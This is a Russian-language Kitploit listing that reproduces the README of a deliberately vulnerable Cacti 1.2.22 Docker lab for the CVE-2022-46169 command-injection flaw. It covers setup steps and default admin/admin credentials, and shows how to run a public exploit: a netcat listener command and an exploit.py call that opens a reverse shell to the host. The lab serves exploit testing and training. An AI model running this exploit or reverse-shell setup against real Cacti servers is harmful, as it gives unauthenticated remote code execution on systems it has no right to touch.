Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cacti-rce-cve-2022-46169-vulnerable-application — ВНИМАНИЕ: Это уязвимое приложение для тестирования эксплойта Cacti command injection (CVE-2022-46169). Запускайте на свой страх и риск! | Kitploit
Инструменты/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеЛаборатории и Практика
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

ВНИМАНИЕ: Это уязвимое приложение для тестирования эксплойта Cacti command injection (CVE-2022-46169). Запускайте на свой страх и риск!

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
123 лет назадЕщё не проверено

Cacti v1.2.22 внедрение команд (CVE-2022-46169) уязвимое приложение

Это уязвимое приложение для тестирования эксплойта уязвимости Cacti (CVE-2022-46169).

ПРЕДУПРЕЖДЕНИЕ!

Это приложение содержит серьезные уязвимости безопасности. Запускайте его на свой страх и риск! Рекомендуется использовать резервную и изолированную среду (например, ВМ с недавним снимком и сетью только для хоста). Не загружайте это приложение на серверы, доступные из Интернета, так как они будут скомпрометированы.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Я не несу ответственности за то, как кто-либо использует это приложение. Единственная цель этого приложения — быть тестовым сценарием для эксплойта CVE-2022-46169, и его не следует использовать в злонамеренных целях. Если ваш сервер будет скомпрометирован вследствие установки этого приложения, это не моя ответственность, а ответственность лица(лиц), загрузивших и установивших его.

Информация об уязвимости

  • CVE-ID: CVE-2022-46169
  • Ссылка: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • Описание: В затронутых версиях уязвимость внедрения команд позволяет неаутентифицированному пользователю выполнять произвольный код на сервере с Cacti, если для какого-либо отслеживаемого устройства был выбран определенный источник данных.

Использование

Вот шаги для настройки окружения:

  1. Запустите docker compose up -d, чтобы запустить композицию.
  2. Вы можете завершить шаги, перейдя в браузере по адресу http://127.0.0.1/cacti, чтобы запустить мастер инициализации Cacti. Если вы получите ошибку, относящуюся к базе данных, просто подождите немного и обновите страницу.
  3. Учетные данные по умолчанию: admin/admin.
  4. Нажимайте "Далее" на всех кнопках во время мастера, выбирая соответствующие параметры. Все значения по умолчанию должны подойти, и все обязательные предварительные требования должны быть выполнены.
  5. После установки вам необходимо настроить новый график:
    1. Нажмите "Создать графики".
    2. В разделе "Шаблоны графиков" в выпадающем меню рядом со "Создать" выберите: "Device - Uptime".
    3. Нажмите кнопку "Создать".

Контейнер будет называться vuln-cacti.

Для уничтожения окружения используйте команду docker compose down.

Официальное руководство по установке Cacti можно найти здесь.

Причина уязвимости

Подробное описание коренной причины уязвимости доступно здесь.

Эксплойт

Публичный эксплойт доступен на Exploit-DB. Для простоты он скопирован в папку exploit/.

Чтобы запустить его:

  1. Используйте netcat на хост-машине для прослушивания входящих соединений.
    root@kitploit:~
    nc -lvp 6669
    
  2. Запустите эксплойт.
    root@kitploit:~
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    
    Подсказка: host.docker.internal используется для доступа к хост-машине из контейнера (ссылка).

Также есть запись в репозитории vulhub.

Авторы

  • Antonio Francesco Sardella - реализация - m3ssap0

Лицензия

Этот проект лицензирован по лицензии Unlicense - подробности см. в файле LICENSE.

Благодарности

  • Stefan Schiller, исследователь безопасности, обнаруживший уязвимость.
  • Riadh Bouchahoua, разработчик эксплойта.
Скачать инструмент